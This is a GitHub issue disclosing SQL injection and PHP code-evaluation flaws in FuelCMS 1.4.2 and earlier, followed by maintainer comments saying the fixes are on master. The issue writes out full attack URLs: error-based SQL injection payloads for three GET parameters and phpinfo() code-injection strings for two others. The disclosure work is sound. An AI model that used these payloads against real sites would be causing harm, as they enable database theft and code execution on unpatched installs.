Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Vulnerability - Code Evaluations & SQL Injections #478

Closed
om3rcitak opened this issue Jul 9, 2018 · 5 comments
Closed

Vulnerability - Code Evaluations & SQL Injections #478

om3rcitak opened this issue Jul 9, 2018 · 5 comments

Comments

@om3rcitak
Copy link

Vulnerability - Code Evaluations & SQL Injections

Environment

  • Version: <=1.4.2
  • OS: Unix, Windows
  • Web server: Any web server
  • PHP: <=7.2
  • Database: Any database

Vulnerability Tree

  1. SQL Injection
    1.1. /fuel/pages/items (GET = search_term)
    1.2. /fuel/pages/items (GET = layout)
    1.3. /fuel/pages/items (GET = published)
  2. Code Evaluation
    2.1. /fuel/pages/select/ (GET = filter)
    2.2. /fuel/preview (POST = data)

1.1. SQL Injection in /fuel/pages/items (GET = search_term)

URL: http://{domain}/{fuelcms_path}/fuel/pages/items?search_term=-1%22%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%22&layout=&search=Search&view_type=list&offset=3&order=asc&col=location&fuel_inline=3&published=yes&limit=50
Parameter Name: search_term
Parameter Type: GET
Attack Pattern: -1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(
)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22

1.2. SQL Injection in /fuel/pages/items (GET = layout)

URL: http://{domain}/{fuelcms_path}/fuel/pages/items?search_term=&layout=-1%22%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%22&search=Search&view_type=list&offset=3&order=asc&col=location&fuel_inline=3&published=yes&limit=50
Parameter Name: layout
Parameter Type: GET
Attack Pattern: -1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(
)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22

1.3. SQL Injection in /fuel/pages/items (GET = published)

URL: http://{domain}/{fuelcms_path}/fuel/pages/items?search_term=&layout=&search=Search&view_type=list&offset=3&order=asc&col=location&fuel_inline=3&published=-1%22%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%22&limit=50
Parameter Name: published
Parameter Type: GET
Attack Pattern: -1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(
)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22

2.1. Code Evaluation in /fuel/pages/select/ (GET = filter)

URL: http://{domain}/{fuelcms_path}/fuel/pages/select/?nocache=1507880376191&input=&target=&title=&class=&pdfs=&filter=%27%2b phpinfo() %2b%27
Parameter Name: filter
Parameter Type: GET
Attack Pattern: %27%2b phpinfo() %2b%27

2.2. Code Evaluation in /fuel/preview (POST = data)

URL: http://{domain}/{fuelcms_path}/fuel/preview?module=pages&field=vars--body
Parameter Name: data
Parameter Type: POST
Attack Pattern: %27%2b phpinfo() %2b%27

daylightstudio pushed a commit that referenced this issue Jul 12, 2018
@martynassateika
Copy link
Contributor

Great finds @om3rcitak!

Shouldn't there be a new bug fix version of FuelCMS after discoveries like this though, @daylightstudio? It feels that code is kept in develop for too long. We could easily be at 1.5 or 2.0 at this point! A lot of people who download the project probably assume that master has the latest stable code and just use that.

@daylightstudio
Copy link
Owner

daylightstudio commented Aug 23, 2018

@martynassateika you are right. There are essentially 2 develop branches going right now that I'd like to merge (develop and feature/php_7.2_compatibility). We currently have a lot of sites on 7.1 still and so the 7.2 vetting has been a little slower but is probably ready.

@cook1emonstr
Copy link

@daylightstudio
Is there a stable fixed version available? We'd like to keep using fuel but can't have a vulnerable site in production.

@daylightstudio
Copy link
Owner

These updates have been applied to the master branch already.

@cook1emonstr
Copy link

These updates have been applied to the master branch already.

Thanks for confirming!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants